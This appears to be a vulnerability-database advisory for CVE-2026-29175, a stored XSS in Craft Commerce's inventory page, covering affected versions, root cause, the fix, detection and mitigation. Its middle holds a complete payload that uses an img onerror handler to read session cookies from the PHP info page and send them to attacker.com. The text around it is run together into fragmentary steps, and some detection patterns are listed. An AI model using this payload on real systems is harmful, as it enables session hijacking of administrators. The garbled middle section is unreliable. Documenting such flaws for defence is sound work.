
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-29175 is a stored cross-site scripting (XSS) vulnerability in Craft Commerce's inventory management page that enables session hijacking. Discovered and disclosed on March 9, 2026, it affects Craft Commerce versions 5.0.0 through 5.5.2 (inclusive), with version 5.5.3 containing the fix. The Product Title, Variant Title, and Variant SKU fields are rendered without proper HTML escaping, allowing an authenticated attacker to inject arbitrary JavaScript that executes in any user's browser upon viewing the inventory page. It carries a CVSS v3.1 score of 5.4 (Medium) and a CVSS v4.0 score of 8.6 (High) (Github Advisory, Craft CMS Advisory).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically in src/controllers/InventoryController.php where the actionInventoryLevelsTableData() method passed user-supplied product and variant field values directly to Cp::chipHtml() and Html::tag() without first encoding them via Html::encode(). The fix (commit 9f0638a) adds explicit Html::encode() calls around $purchasable->getDescription(), $inventoryLevel['description'], and $inventoryLevel['sku'] before rendering. Exploitation requires low-level authenticated access (control panel access with product create/edit permissions), and the payload persists in the database, executing automatically whenever any user — including administrators — navigates to /admin/commerce/inventory (Craft CMS Advisory, Fix Commit).
Successful exploitation allows an attacker to steal session cookies from any user who views the Commerce Inventory page, including administrators, enabling full session hijacking without requiring additional user interaction or elevated session approval. The attack leverages the PHP Info utility page (/admin/utilities/php-info), which exposes unmasked session cookie values in HTTP_COOKIE and $_SERVER['HTTP_COOKIE'] parameters. Beyond session hijacking, the advisory notes the vulnerability can be chained to achieve full database exfiltration or perform arbitrary administrative actions after compromising an administrator session (Craft CMS Advisory).
A detailed proof-of-concept exploit with step-by-step reproduction instructions and a concrete malicious payload targeting the /admin/commerce/inventory endpoint is publicly available in the GitHub security advisory (Craft CMS Advisory). The EPSS score is approximately 0.014% (3rd percentile), indicating a low current probability of widespread exploitation. There is no evidence of active in-the-wild exploitation at this time, no known threat actor attribution, and the vulnerability is not listed in the CISA KEV catalog (Github Advisory).
<img src=x onerror="fetch('/admin/utilities/php-info').then(r=>r.text()).then(d=>{let m=d.match(/HTTP_COOKIE.*?<td>(.*?)<\/td>/s);fetch('https://attacker.com/?c='+encodeURIComponent(m?m[1]:''))})">./admin/commerce/inventory), the stored XSS payload executes automatically in their browser./admin/utilities/php-info, parses the unmasked session cookie values from the HTTP_COOKIE or $_SERVER['HTTP_COOKIE'] fields, and exfiltrates them to the attacker-controlled server.attacker.com) containing URL-encoded cookie data; unusual fetch requests to /admin/utilities/php-info originating from client-side JavaScript./admin/utilities/php-info from browser sessions that do not correspond to normal administrative activity; access log entries for /admin/commerce/inventory followed immediately by outbound requests to unknown external hosts.<img, onerror=, <script) in the Title or SKU fields.Upgrade Craft Commerce to version 5.5.3 or later, which applies proper Html::encode() escaping to the Product Title, Variant Title, and Variant SKU fields in the inventory controller (commit 9f0638a) (Fix Commit). As a secondary mitigation, restrict access to the Commerce inventory management pages to only trusted, authorized personnel, and consider disabling or restricting access to the PHP Info utility page (/admin/utilities/php-info) to limit cookie exposure. Until patching is possible, monitor for suspicious product/variant records containing HTML or JavaScript in title and SKU fields (Craft CMS Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."